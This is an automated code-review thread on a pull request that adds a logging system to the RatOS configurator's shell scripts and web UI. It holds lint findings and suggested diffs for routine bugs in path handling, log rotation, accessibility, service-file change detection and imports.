  • ensure_sudo_command_whitelisting (352-412)
  • ensure_pnpm_installation (205-213)
  • install_logrotation (234-261)
  • pnpm_install (141-203)
  • install_udev_rule (319-350)
  • install_cli (294-309)
  • symlink_configuration (275-292)
  • install_or_update_service_file (42-139)
configuration/scripts/ratos-install.sh (2)
configuration/scripts/ratos-logging.sh (7)
  • log_script_start (652-662)
  • log_info (456-456)
  • execute_with_logging (464-616)
  • log_error (458-458)
  • get_timestamp (110-113)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
configuration/scripts/ratos-common.sh (5)
  • report_status (12-16)
  • install_beacon (74-116)
  • install_hooks (147-217)
  • ensure_sudo_command_whitelisting (276-327)
  • verify_registered_extensions (329-491)
src/scripts/change-hostname.sh (1)
configuration/scripts/ratos-logging.sh (8)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • get_timestamp (110-113)
  • log_error (458-458)
  • log_info (456-456)
  • execute_with_logging (464-616)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
configuration/scripts/ratos-common.sh (2)
configuration/scripts/ratos-logging.sh (6)
  • setup_error_trap (619-627)
  • log_info (456-456)
  • execute_with_logging (464-616)
  • log_error (458-458)
  • log_warn (457-457)
  • log_debug (455-455)
src/scripts/common.sh (1)
  • report_status (15-22)
src/scripts/common.sh (2)
configuration/scripts/ratos-logging.sh (3)
  • log_info (456-456)
  • execute_with_logging (464-616)
  • log_error (458-458)
configuration/scripts/ratos-common.sh (1)
  • report_status (12-16)
configuration/scripts/klipper-mcu-update.sh (1)
configuration/scripts/ratos-logging.sh (8)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • get_timestamp (110-113)
  • log_error (458-458)
  • log_info (456-456)
  • execute_with_logging (464-616)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
src/app/logs/page.tsx (2)
src/app/logs/_components/logs-error-boundary.tsx (1)
  • LogsErrorBoundary (60-82)
src/app/logs/_components/logs-viewer.tsx (1)
  • LogsViewer (20-145)
src/app/logs/_components/virtualized-log-list.tsx (6)
src/app/logs/_components/types.ts (2)
  • LogEntry (4-13)
  • LogSummary (15-28)
src/app/logs/_components/enhanced-log-level-selector.tsx (1)
  • EnhancedLogLevelSelector (12-96)
src/app/logs/_components/log-faceted-filter.tsx (1)
  • LogFacetedFilter (26-112)
src/components/common/spinner.tsx (1)
  • Spinner (3-35)
src/components/common/error-message.tsx (1)
  • ErrorMessage (11-22)
src/app/logs/_components/log-entry-component.tsx (1)
  • LogEntryComponent (11-62)
src/app/logs/_components/logs-viewer.tsx (4)
src/app/logs/_components/use-unified-log-data.ts (1)
  • useUnifiedLogData (40-134)
src/components/common/error-message.tsx (1)
  • ErrorMessage (11-22)
src/app/logs/_components/log-summary-header.tsx (1)
  • LogSummaryHeader (31-240)
src/app/logs/_components/virtualized-log-list.tsx (1)
  • VirtualizedLogList (32-185)
configuration/scripts/moonraker-update.sh (4)
configuration/scripts/ratos-logging.sh (8)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • get_timestamp (110-113)
  • log_info (456-456)
  • log_error (458-458)
  • execute_with_logging (464-616)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
configuration/scripts/moonraker-ensure-policykit-rules.sh (1)
  • ensure_moonraker_policiykit_rules (11-45)
configuration/scripts/ratos-common.sh (1)
  • ensure_service_permission (219-246)
src/scripts/common.sh (1)
  • ensure_service_permission (215-222)
src/app/logs/_components/log-summary-header.tsx (7)
src/app/logs/_components/types.ts (1)
  • LogSummary (15-28)
src/components/common/spinner.tsx (1)
  • Spinner (3-35)
src/components/common/button.tsx (1)
  • Button (118-205)
src/helpers/util.ts (1)
  • formatBytes (9-15)
src/components/common/badge.tsx (1)
  • Badge (197-204)
src/components/common/modal.tsx (1)
  • Modal (94-239)
src/components/common/animated-container.tsx (1)
  • AnimatedContainer (7-54)
src/app/logs/_components/log-faceted-filter.tsx (2)
src/components/common/button.tsx (1)
  • Button (118-205)
src/components/common/badge.tsx (1)
  • Badge (197-204)
scripts/test-logging-integration.sh (4)
scripts/test-complete-logging-system.sh (4)
  • test_log_section (51-53)
  • test_log_pass (36-39)
  • test_log_fail (41-45)
  • main (362-393)
configuration/scripts/ratos-common.sh (1)
  • report_status (12-16)
src/scripts/common.sh (1)
  • report_status (15-22)
configuration/scripts/ratos-logging.sh (1)
  • execute_with_logging (464-616)
scripts/test-complete-logging-system.sh (4)
scripts/test-logging-integration.sh (3)
  • test_log_section (51-53)
  • test_log_pass (36-39)
  • test_log_fail (41-45)
configuration/scripts/ratos-logging.sh (17)
  • log_trace (454-454)
  • log_debug (455-455)
  • log_info (456-456)
  • log_warn (457-457)
  • log_error (458-458)
  • start_timer (120-134)
  • stop_timer (137-172)
  • increment_counter (175-196)
  • get_counter (199-202)
  • log_performance_summary (222-251)
  • execute_with_logging (464-616)
  • check_system_resources (697-749)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • log_script_complete (665-674)
  • get_timestamp (110-113)
  • create_log_summary (677-694)
configuration/scripts/ratos-logging-config.sh (4)
  • create_default_config (28-71)
  • load_logging_config (74-95)
  • update_config (182-211)
  • validate_config (98-143)
configuration/scripts/ratos-log-rotation.sh (2)
  • get_file_size (40-47)
  • rotate_log_file (89-154)
src/cli/commands.tsx (2)
src/cli/commands/logs.tsx (1)
  • addLogCommands (252-378)
src/cli/util.tsx (1)
  • log (221-226)
src/app/logs/_components/enhanced-log-level-selector.tsx (2)
src/app/logs/_components/types.ts (2)
  • LogSummary (15-28)
  • LOG_LEVELS (30-82)
src/components/common/badge.tsx (1)
  • Badge (197-204)
src/__tests__/update-logs.test.ts (1)
src/server/routers/logs.ts (4)
  • parseLogFile (79-97)
  • filterBySource (189-194)
  • generateSummary (100-173)
  • filterBySeverity (176-178)
src/server/routers/index.ts (1)
src/server/routers/logs.ts (1)
  • logsRouter (202-444)
configuration/scripts/ratos-logging.sh (2)
configuration/scripts/ratos-logging-config.sh (1)
  • init_logging_config (214-240)
configuration/scripts/ratos-log-rotation.sh (1)
  • rotate_log_file (89-154)
src/server/routers/logs.ts (4)
src/scripts/generate-mock-logs.js (3)
  • logPath (191-191)
  • entries (120-120)
  • entries (201-201)
src/app/logs/_components/types.ts (2)
  • LogEntry (4-13)
  • LogSummary (15-28)
src/server/helpers/ndjson.ts (1)
  • readObjects (552-649)
src/scripts/generate-mock-update-logs.ts (1)
  • generateMockLogs (270-270)
src/app/logs/_components/logs-error-boundary.tsx (2)
src/app/error.tsx (1)
  • Error (16-83)
src/components/common/error-message.tsx (1)
  • ErrorMessage (11-22)
src/app/logs/_components/types.ts (2)
src/server/routers/logs.ts (1)
  • LogEntry (65-65)
src/scripts/generate-mock-logs.js (1)
  • LOG_LEVELS (12-19)
configuration/scripts/beacon-update.sh (2)
configuration/scripts/ratos-logging.sh (7)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • get_timestamp (110-113)
  • log_error (458-458)
  • log_info (456-456)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
configuration/scripts/ratos-common.sh (1)
  • update_beacon_fw (44-72)
🪛 GitHub Actions: Linter: shellcheck
configuration/scripts/ratos-logging-config.sh

[error] 1-1: Not executable: '../RatOS-configurator/configuration/scripts/ratos-logging-config.sh'. Please fix permissions (chmod +x). Step: Run './configuration/scripts/ensure-executable-scripts.sh'.

configuration/scripts/ratos-log-rotation.sh

[error] 1-1: Not executable: '../RatOS-configurator/configuration/scripts/ratos-log-rotation.sh'. Please fix permissions (chmod +x). Step: Run './configuration/scripts/ensure-executable-scripts.sh'.

🪛 Biome (2.1.2)
src/app/logs/_components/log-summary-header.tsx

[error] 193-193: This hook is being called conditionally, but all hooks must be called in the exact same order in every component render.

For React to preserve state between calls, hooks needs to be called unconditionally and always in the same order.
See https://reactjs.org/docs/hooks-rules.html#only-call-hooks-at-the-top-level

(lint/correctness/useHookAtTopLevel)

🪛 markdownlint-cli2 (0.17.2)
LOGGING_SYSTEM.md

64-64: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


93-93: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


134-134: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


142-142: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)

Comment on lines +115 to 117
echo "Loading environment from $envFile"
load_env "$envFile"
fi

⚠️ Potential issue

Write log lines to stderr to avoid breaking scripts that source this file

This script is commonly sourced; emitting to stdout can pollute/corrupt caller output (e.g., JSON, CLI piping). Redirect to stderr and prefer printf for portability.

Apply this diff:

-	echo "Loading environment from $envFile"
+	printf '[env] Loading environment from %s\n' "$envFile" >&2
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
echo "Loading environment from $envFile"
load_env "$envFile"
fi
printf '[env] Loading environment from %s\n' "$envFile" >&2
load_env "$envFile"
fi
🤖 Prompt for AI Agents
In configuration/scripts/environment.sh around lines 115 to 117, the script
prints "Loading environment from $envFile" to stdout which can corrupt output
when the file is sourced; change the echo to a stderr-prefixed, portable printf
call (e.g., printf '%s\n' "Loading environment from $envFile" >&2) so log lines
go to stderr, and leave the load_env call unchanged.

Comment on lines +119 to 121
echo "Loading environment from $userEnvFile"
load_env "$userEnvFile"
fi

⚠️ Potential issue

Same here: redirect user env load message to stderr

Keep output clean for callers; use printf and stderr.

Apply this diff:

-	echo "Loading environment from $userEnvFile"
+	printf '[env] Loading environment from %s\n' "$userEnvFile" >&2
📝 Committable suggestion


Suggested change
echo "Loading environment from $userEnvFile"
load_env "$userEnvFile"
fi
printf '[env] Loading environment from %s\n' "$userEnvFile" >&2
load_env "$userEnvFile"
fi
🤖 Prompt for AI Agents
In configuration/scripts/environment.sh around lines 119 to 121, the
informational echo "Loading environment from $userEnvFile" should be written to
stderr using printf; replace the echo with a printf that formats the filename
and redirects to stderr (e.g. printf 'Loading environment from %s\n'
"$userEnvFile" >&2) and leave the subsequent load_env call unchanged so callers'
stdout remains clean.

Comment on lines +21 to +26
if ensure_moonraker_policiykit_rules; then
log_info "Moonraker PolicyKit rules ensured successfully" "main"
else
log_error "Failed to ensure Moonraker PolicyKit rules" "main" "POLICYKIT_RULES_FAILED"
exit_code=1
fi

🛠️ Refactor suggestion

🧩 Analysis chain

Typo in function name should be fixed

The function name ensure_moonraker_policiykit_rules contains a typo ("policiy" should be "policy"). This should be corrected in the source file moonraker-ensure-policykit-rules.sh.

Let me verify if this typo exists in the source file:


🏁 Script executed:

#!/bin/bash
# Check if the typo exists in the function definition
rg -n "ensure_moonraker_policiykit_rules" configuration/scripts/

Length of output: 186


Rename function ensure_moonraker_policiykit_rules → ensure_moonraker_policykit_rules

Fix the typo ("policiy" → "policy") in the function name and update the definition and all callers:

  • configuration/scripts/moonraker-ensure-policykit-rules.sh:11 (definition)
  • configuration/scripts/moonraker-update.sh:21 (call)
🤖 Prompt for AI Agents
In configuration/scripts/moonraker-update.sh around lines 21 to 26 the function
name is misspelled as ensure_moonraker_policiykit_rules; rename it to
ensure_moonraker_policykit_rules and update its definition in
configuration/scripts/moonraker-ensure-policykit-rules.sh at line 11 to match,
then update all callers (including the call in moonraker-update.sh) to use the
corrected name so the script invokes the defined function.

Comment on lines +9 to +12
RATOS_LOGGING_CONFIG_FILE="${RATOS_PRINTER_DATA_DIR:-"~"}/ratos-logging.conf"
RATOS_LOGGING_CONFIG_DIR="$(dirname "$RATOS_LOGGING_CONFIG_FILE")"
RATOS_LOG_FILE=${RATOS_LOG_FILE:-"${RATOS_PRINTER_DATA_DIR:-"~"}/logs/ratos-configurator.log"}


⚠️ Potential issue

Bug: "" is quoted and will not expand; creates literal “” dirs/files.

Defaults should use $HOME (expanded), not "~". Current code can create ./~ and ./~/logs unexpectedly.

-RATOS_LOGGING_CONFIG_FILE="${RATOS_PRINTER_DATA_DIR:-"~"}/ratos-logging.conf"
-RATOS_LOGGING_CONFIG_DIR="$(dirname "$RATOS_LOGGING_CONFIG_FILE")"
-RATOS_LOG_FILE=${RATOS_LOG_FILE:-"${RATOS_PRINTER_DATA_DIR:-"~"}/logs/ratos-configurator.log"}
+RATOS_LOGGING_CONFIG_FILE="${RATOS_PRINTER_DATA_DIR:-${HOME}}/ratos-logging.conf"
+RATOS_LOGGING_CONFIG_DIR="$(dirname "$RATOS_LOGGING_CONFIG_FILE")"
+RATOS_LOG_FILE=${RATOS_LOG_FILE:-"${RATOS_PRINTER_DATA_DIR:-${HOME}}/logs/ratos-configurator.log"}
📝 Committable suggestion


Suggested change
RATOS_LOGGING_CONFIG_FILE="${RATOS_PRINTER_DATA_DIR:-"~"}/ratos-logging.conf"
RATOS_LOGGING_CONFIG_DIR="$(dirname "$RATOS_LOGGING_CONFIG_FILE")"
RATOS_LOG_FILE=${RATOS_LOG_FILE:-"${RATOS_PRINTER_DATA_DIR:-"~"}/logs/ratos-configurator.log"}
RATOS_LOGGING_CONFIG_FILE="${RATOS_PRINTER_DATA_DIR:-${HOME}}/ratos-logging.conf"
RATOS_LOGGING_CONFIG_DIR="$(dirname "$RATOS_LOGGING_CONFIG_FILE")"
RATOS_LOG_FILE=${RATOS_LOG_FILE:-"${RATOS_PRINTER_DATA_DIR:-${HOME}}/logs/ratos-configurator.log"}
🤖 Prompt for AI Agents
In configuration/scripts/ratos-logging-config.sh around lines 9 to 12, the
default literal "~" is quoted and will not expand, producing paths like ./~ and
./~/logs; change the defaults to use the expanded $HOME instead (e.g. use
${RATOS_PRINTER_DATA_DIR:-"$HOME"} for RATOS_LOGGING_CONFIG_FILE and
${RATOS_PRINTER_DATA_DIR:-"$HOME"}/logs for RATOS_LOG_FILE) so dirname and
subsequent file paths operate on an actual home directory path.

Comment on lines +278 to +287
if [[ $LOG_ROTATION_AVAILABLE == true ]]; then
# Convert RATOS_LOG_MAX_SIZE to size format expected by rotation script
local max_size_str="${RATOS_LOG_MAX_SIZE}"
if [[ $RATOS_LOG_MAX_SIZE -gt 0 ]]; then
# Convert bytes to MB for readability
max_size_str="$((RATOS_LOG_MAX_SIZE / 1024 / 1024))M"
fi

rotate_log_file "$RATOS_LOG_FILE" "$max_size_str" "$RATOS_LOG_BACKUP_COUNT" "true"
return $?

⚠️ Potential issue

Do not downscale byte threshold to MB; it breaks small limits.

Dividing bytes to MB can yield 0M for values <1MiB, disabling rotation unintentionally. Pass bytes as-is and let the rotation script parse numeric bytes.

-        local max_size_str="${RATOS_LOG_MAX_SIZE}"
-        if [[ $RATOS_LOG_MAX_SIZE -gt 0 ]]; then
-            # Convert bytes to MB for readability
-            max_size_str="$((RATOS_LOG_MAX_SIZE / 1024 / 1024))M"
-        fi
-
-        rotate_log_file "$RATOS_LOG_FILE" "$max_size_str" "$RATOS_LOG_BACKUP_COUNT" "true"
+        rotate_log_file "$RATOS_LOG_FILE" "$RATOS_LOG_MAX_SIZE" "$RATOS_LOG_BACKUP_COUNT" "true"
📝 Committable suggestion


Suggested change
if [[ $LOG_ROTATION_AVAILABLE == true ]]; then
# Convert RATOS_LOG_MAX_SIZE to size format expected by rotation script
local max_size_str="${RATOS_LOG_MAX_SIZE}"
if [[ $RATOS_LOG_MAX_SIZE -gt 0 ]]; then
# Convert bytes to MB for readability
max_size_str="$((RATOS_LOG_MAX_SIZE / 1024 / 1024))M"
fi
rotate_log_file "$RATOS_LOG_FILE" "$max_size_str" "$RATOS_LOG_BACKUP_COUNT" "true"
return $?
if [[ $LOG_ROTATION_AVAILABLE == true ]]; then
rotate_log_file "$RATOS_LOG_FILE" "$RATOS_LOG_MAX_SIZE" "$RATOS_LOG_BACKUP_COUNT" "true"
return $?
🤖 Prompt for AI Agents
In configuration/scripts/ratos-logging.sh around lines 278 to 287, the code
converts RATOS_LOG_MAX_SIZE from bytes to megabytes which turns values under
1MiB into "0M" and disables rotation; instead stop downscaling—pass the original
byte value (as a plain number or string representing bytes) to rotate_log_file
so the rotation script can parse numeric bytes itself; remove the division-to-M
conversion and ensure max_size_str is set to RATOS_LOG_MAX_SIZE when greater
than zero.

Comment on lines 110 to +113
const SelectItem = React.forwardRef<
React.ElementRef<typeof SelectPrimitive.Item>,
React.ComponentPropsWithoutRef<typeof SelectPrimitive.Item>
>(({ className, children, ...props }, ref) => (
React.ComponentPropsWithoutRef<typeof SelectPrimitive.Item> & { fullElement?: boolean }
>(({ className, children, fullElement, ...props }, ref) => (

⚠️ Potential issue

🧩 Analysis chain

fullElement branch drops ItemText; breaks typeahead/a11y

Radix Select relies on ItemText for label/typeahead. Rendering a plain div removes that. Use ItemText asChild to keep semantics.

Apply:

- {fullElement ? (
-   <div className="flex-1">{children}</div>
- ) : (
-   <SelectPrimitive.ItemText className="flex-1">{children}</SelectPrimitive.ItemText>
- )}
+ {fullElement ? (
+   <SelectPrimitive.ItemText asChild>
+     <div className="flex-1">{children}</div>
+   </SelectPrimitive.ItemText>
+ ) : (
+   <SelectPrimitive.ItemText className="flex-1">{children}</SelectPrimitive.ItemText>
+ )}

Please keyboard-test typeahead after the change.

Also applies to: 127-131


🏁 Script executed:

#!/bin/bash
set -euo pipefail
echo "PWD: $(pwd)"
echo "Searching repo for Select-related identifiers..."
rg -n --hidden -S "SelectPrimitive\.ItemText|SelectPrimitive\.Item|const SelectItem\b|fullElement\b|asChild\b|ItemText\b" || true

echo
echo "Showing contextual matches (up to 8 lines) for 'fullElement' and 'ItemText'..."
rg -n -C8 --hidden -S "fullElement|ItemText" || true

echo
echo "Attempting to locate likely select component files (select.tsx / select/index.tsx / src/components/ui/select.tsx)..."
rg -n --hidden -S "select\.tsx|select/index\.tsx|src/components/ui/select\.tsx" || true

# If a select.tsx file exists, print first 240 lines for inspection
select_files="$(rg --hidden --files | rg -i 'select(\.tsx|/index\.tsx|/select\.tsx)?' || true)"
if [ -n "$select_files" ]; then
  echo
  echo "Candidate files found:"
  echo "$select_files"
  echo
  for f in $select_files; do
    echo "---- $f (first 240 lines) ----"
    sed -n '1,240p' "$f" || true
    echo
  done
else
  echo "No obvious select.tsx files matched filename patterns; listing files that contain 'SelectPrimitive' or 'SelectItem' for manual inspection..."
  rg -n --hidden -S "SelectPrimitive|SelectItem" || true
fi

Length of output: 43924


fullElement branch drops ItemText; breaks typeahead/a11y

Radix Select needs SelectPrimitive.ItemText for the accessible label/typeahead; the current fullElement branch renders a plain div and removes that semantics.

Location: src/components/ui/select.tsx (around lines 127–131)

Apply:

- {fullElement ? (
-   <div className="flex-1">{children}</div>
- ) : (
-   <SelectPrimitive.ItemText className="flex-1">{children}</SelectPrimitive.ItemText>
- )}
+ {fullElement ? (
+   <SelectPrimitive.ItemText asChild>
+     <div className="flex-1">{children}</div>
+   </SelectPrimitive.ItemText>
+ ) : (
+   <SelectPrimitive.ItemText className="flex-1">{children}</SelectPrimitive.ItemText>
+ )}

Keyboard-test typeahead after the change.

📝 Committable suggestion


Suggested change
const SelectItem = React.forwardRef<
React.ElementRef<typeof SelectPrimitive.Item>,
React.ComponentPropsWithoutRef<typeof SelectPrimitive.Item>
>(({ className, children, ...props }, ref) => (
React.ComponentPropsWithoutRef<typeof SelectPrimitive.Item> & { fullElement?: boolean }
>(({ className, children, fullElement, ...props }, ref) => (
const SelectItem = React.forwardRef<
React.ElementRef<typeof SelectPrimitive.Item>,
React.ComponentPropsWithoutRef<typeof SelectPrimitive.Item> & { fullElement?: boolean }
>(({ className, children, fullElement, ...props }, ref) => (
<SelectPrimitive.Item ref={ref} className={className} {...props}>
{fullElement ? (
<SelectPrimitive.ItemText asChild>
<div className="flex-1">{children}</div>
</SelectPrimitive.ItemText>
) : (
<SelectPrimitive.ItemText className="flex-1">{children}</SelectPrimitive.ItemText>
)}
</SelectPrimitive.Item>
));
🤖 Prompt for AI Agents
In src/components/ui/select.tsx around lines 110–113, the fullElement branch
currently replaces SelectPrimitive.ItemText with a plain div, breaking typeahead
and a11y; restore the semantics by rendering SelectPrimitive.ItemText (wrapping
the visible children or text) inside the fullElement branch instead of a plain
div so the Item retains its accessible label/typeahead behavior, and keep any
styling by applying the same className to the ItemText or a surrounding element
as needed; after the change validate keyboard typeahead works.

Comment on lines 86 to +90
if [ -f "${SERVICE_FILE}" ]; then
if [ "$(md5sum "${SERVICE_FILE_TEMPLATE}")" != "$(md5sum "${SERVICE_FILE}")" ]; then
sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"
sudo systemctl daemon-reload
echo "Service file updated!"
if declare -f execute_with_logging >/dev/null 2>&1; then
if execute_with_logging "install_or_update_service_file" "SERVICE_UPDATE_FAILED" sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"; then
if execute_with_logging "install_or_update_service_file" "SYSTEMCTL_RELOAD_FAILED" sudo systemctl daemon-reload; then

⚠️ Potential issue

Fix service change detection: compare against processed file, not the raw template.

Comparing ${SERVICE_FILE_TEMPLATE} to ${SERVICE_FILE} will almost always report a difference, because the installed unit contains substitutions (and `md5sum`'s output embeds the differing file names). Compare the processed /tmp/ratos-configurator.service instead to avoid unnecessary reloads/restarts.

Apply:

```diff
-    if [ "$(md5sum "${SERVICE_FILE_TEMPLATE}")" != "$(md5sum "${SERVICE_FILE}")" ]; then
+    if [ "$(md5sum /tmp/ratos-configurator.service | awk '{print $1}')" != "$(md5sum "${SERVICE_FILE}" | awk '{print $1}')" ]; then
```
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change

```diff
 if [ -f "${SERVICE_FILE}" ]; then
-	if [ "$(md5sum "${SERVICE_FILE_TEMPLATE}")" != "$(md5sum "${SERVICE_FILE}")" ]; then
+	if [ "$(md5sum /tmp/ratos-configurator.service | awk '{print $1}')" != "$(md5sum "${SERVICE_FILE}" | awk '{print $1}')" ]; then
 		if declare -f execute_with_logging >/dev/null 2>&1; then
 			if execute_with_logging "install_or_update_service_file" "SERVICE_UPDATE_FAILED" sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"; then
 				if execute_with_logging "install_or_update_service_file" "SYSTEMCTL_RELOAD_FAILED" sudo systemctl daemon-reload; then
```
🤖 Prompt for AI Agents
In src/scripts/common.sh around lines 86 to 90, the script currently compares
md5sum of the raw template (${SERVICE_FILE_TEMPLATE}) to the installed unit,
which will differ after template substitutions; update the comparison to use the
processed temp unit (e.g. /tmp/ratos-configurator.service or whatever variable
holds the processed file) instead of the raw template, and ensure the processed
file exists before computing its md5sum; replace the md5sum left-hand operand
with the processed file path, keep the right-hand operand as the installed
${SERVICE_FILE}, and retain the guarded execute_with_logging/mv and systemctl
calls.
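
To see why comparing the processed file matters, here is a standalone sketch with throwaway files (all paths and contents below are hypothetical, not the real RatOS template):

```shell
#!/bin/sh
# Sketch: hash the *processed* unit rather than the raw template, so an
# already-up-to-date install compares equal. All files here are throwaway.
set -eu
tmpdir="$(mktemp -d)"
printf 'ExecStart=/home/pi/run\n' > "$tmpdir/processed.service"  # template after substitution
printf 'ExecStart=__HOME__/run\n' > "$tmpdir/template.service"   # raw template with placeholder
cp "$tmpdir/processed.service" "$tmpdir/installed.service"       # installed unit is current

# Keep only the first md5sum field so differing file names can't poison the comparison
hash_of() { md5sum "$1" | awk '{print $1}'; }

if [ "$(hash_of "$tmpdir/processed.service")" = "$(hash_of "$tmpdir/installed.service")" ]; then
	echo "processed comparison: no update needed"
fi
if [ "$(hash_of "$tmpdir/template.service")" != "$(hash_of "$tmpdir/installed.service")" ]; then
	echo "template comparison: spurious difference"
fi
rm -rf "$tmpdir"
```

Note the `awk '{print $1}'`: `md5sum FILE` prints the hash followed by the file name, so comparing full `md5sum` outputs of two files at different paths never compares equal even when the contents match.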

Comment on lines +6 to +9

```sh
# Source the logging library
# shellcheck source=../../configuration/scripts/ratos-logging.sh
source "$BASE_DIR/configuration/scripts/ratos-logging.sh"
```


⚠️ Potential issue

BASE_DIR may be unset here; guard before sourcing logging.

setup.sh uses $BASE_DIR to source ratos-logging.sh but relies on common.sh to define it. Add a fallback to prevent sourcing from /configuration/... when BASE_DIR is empty.

```diff
-# shellcheck source=../../configuration/scripts/ratos-logging.sh
-source "$BASE_DIR/configuration/scripts/ratos-logging.sh"
+# shellcheck source=../../configuration/scripts/ratos-logging.sh
+: "${BASE_DIR:=$(cd "$SCRIPT_DIR/.." && pwd -P)}"
+source "$BASE_DIR/configuration/scripts/ratos-logging.sh"
```
📝 Committable suggestion

Suggested change

```diff
 # Source the logging library
 # shellcheck source=../../configuration/scripts/ratos-logging.sh
+: "${BASE_DIR:=$(cd "$SCRIPT_DIR/.." && pwd -P)}"
 source "$BASE_DIR/configuration/scripts/ratos-logging.sh"
```
🤖 Prompt for AI Agents
In src/scripts/setup.sh around lines 6-9, the script unconditionally sources
"$BASE_DIR/configuration/scripts/ratos-logging.sh" but BASE_DIR may be unset;
add a guard before sourcing: check if BASE_DIR is empty or unset and either set
a safe default (e.g. compute BASE_DIR relative to the script directory, such as
two levels up from the script) or exit with a clear error, then source using the
validated/quoted BASE_DIR; this prevents accidentally sourcing
"/configuration/..." when BASE_DIR is empty.
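
The `: "${VAR:=default}"` idiom used in the suggested guard assigns a default only when the variable is unset or empty; a minimal demonstration (paths are made up):

```shell
#!/bin/sh
# `:` is a no-op command; the ${VAR:=default} expansion inside its argument
# assigns VAR only when VAR is unset or empty, and keeps an explicit value.
unset BASE_DIR
: "${BASE_DIR:=/fallback/dir}"
echo "$BASE_DIR"   # prints /fallback/dir

BASE_DIR=/explicit/dir
: "${BASE_DIR:=/fallback/dir}"
echo "$BASE_DIR"   # prints /explicit/dir
```

This is why the guard is safe to add unconditionally: callers that already define BASE_DIR are unaffected, while a bare invocation of setup.sh gets a sane default instead of sourcing from "/configuration/...".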

Comment on lines 14 to 23

```sh
verify_ready()
{
	log_info "Verifying script execution requirements" "verify_ready"
	if [ "$EUID" -eq 0 ]; then
		echo "This script must not run as root"
		log_error "Script attempted to run as root" "verify_ready" "ROOT_EXECUTION_DENIED"
		exit 1
	fi
	log_info "Script execution requirements verified" "verify_ready"
}
```

⚠️ Potential issue

Don’t exit inside a step; return and let the orchestrator handle summary/logging.

exit 1 aborts the script and skips create_log_summary/log_script_complete. Use return 1 and keep fail-fast semantics at the caller if desired.

```diff
-        exit 1
+        return 1
```

If you want to fail fast, check the return value and exit immediately in the main block right after verify_ready.

🤖 Prompt for AI Agents
In src/scripts/setup.sh around lines 14 to 23, the verify_ready function calls
exit 1 when detecting root execution which aborts the whole script and prevents
downstream summary/logging; change the function to return 1 instead of exiting
so callers can decide fail-fast behavior, and update any places that call
verify_ready in the main block to check its return value and call exit if
immediate termination is desired (i.e., if ! verify_ready; then exit 1; fi),
preserving current logging behavior inside verify_ready.
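
The behavioural difference is easy to demonstrate outside the setup script; a sketch with a hypothetical failing step (none of these function names exist in the PR):

```shell
#!/bin/sh
# Sketch: a step that *returns* non-zero lets the caller keep running (and
# write its summary), whereas `exit 1` inside the function would abort the
# whole script at that point.
failing_step() {
	echo "step: requirement check failed"
	return 1
}

if ! failing_step; then
	echo "main: step failed, recording it in the summary"
fi
echo "main: summary still runs"
```

With `exit 1` in place of `return 1`, only the first line would ever print; `exit` terminates the shell even when the function is called inside an `if` condition.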

Comment on lines +269 to +270

```ts
const { generateMockLogs } = await import('@/scripts/generate-mock-update-logs');
await generateMockLogs();
```

⚠️ Potential issue

🧩 Analysis chain

Verify dynamic import path for mock data generator

The dynamic import uses a TypeScript path alias that may not resolve correctly in production builds.


🏁 Script executed:

```sh
#!/bin/bash
# Check if the mock data generator file exists and verify the import path
fd -t f "generate-mock-update-logs" --exec ls -la {}
# Check for any build/dist artifacts that might affect the import path
fd -t d "dist|build" -d 2 | head -5
```

Length of output: 91


Use a runtime-resolvable import instead of the '@' alias

src/server/routers/logs.ts (lines 269–270): confirmed src/scripts/generate-mock-update-logs.ts exists; import('@/scripts/generate-mock-update-logs') relies on a TypeScript path alias that likely won't resolve at runtime — replace with a relative import ('../../scripts/generate-mock-update-logs') or ensure your build/runtime resolves the '@' alias.

🤖 Prompt for AI Agents
In src/server/routers/logs.ts around lines 269-270, the dynamic import uses the
TypeScript '@' path alias (import('@/scripts/generate-mock-update-logs')), which
may not resolve at runtime; replace it with a runtime-resolvable relative import
import('../../scripts/generate-mock-update-logs') (from src/server/routers to
src/scripts) or alternatively ensure your build/runtime is configured to resolve
the '@' alias so the dynamic import works in production.
